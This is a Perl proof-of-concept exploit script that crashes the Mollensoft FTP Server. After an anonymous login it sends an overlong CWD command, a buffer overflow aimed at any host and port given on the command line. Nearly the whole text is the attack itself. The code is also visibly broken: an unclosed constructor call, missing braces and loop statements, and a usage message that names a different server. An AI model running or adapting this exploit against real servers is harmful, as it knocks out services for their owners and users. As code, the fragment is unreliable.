# Mollensoft FTP Server CMD Buffer Overflow
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use IO::Socket::INET;
usage() unless (@ARGV == 2);
my $host = shift(@ARGV);
my $port = shift(@ARGV);
# create the socket
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host,
$socket or die "Cannot connect to host!\n";
# receive greeting
my $repcode = "220 ";
my $response = recv_reply($socket, $repcode);
print $response;
# send USER command
#my $username = "%00" x 2041;
my $username = "anonymous";
print "USER $username\r\n";
print $socket "USER $username\r\n";
select(undef, undef, undef, 0.002); # sleep of 2 milliseconds
# send PASS command
my $password = "a\@b.com";
print "PASS $password\r\n";
print $socket "PASS $password\r\n";
my $cmd = "CWD ";
$cmd .= "A" x 224; # Value can range from 224 to 1018
$cmd .= "\r\n";
print "length: ".length($cmd)."\n";
print $socket $cmd;
$repcode = "";
recv_reply($socket, $repcode);
sub usage
# print usage information
print "\nUsage: Mollensoft_FTP_Server_crash.pl <host> <port>\n
<host> - The host to connect to
<port> - The TCP port which WarFTP is listening on\n\n";
sub recv_reply
# retrieve any reply
my $socket = shift;
my $repcode = shift;
$socket or die "Can't receive on socket\n";
my $res="";
$res .= $_;
if (/$repcode/) { last; }
return $res;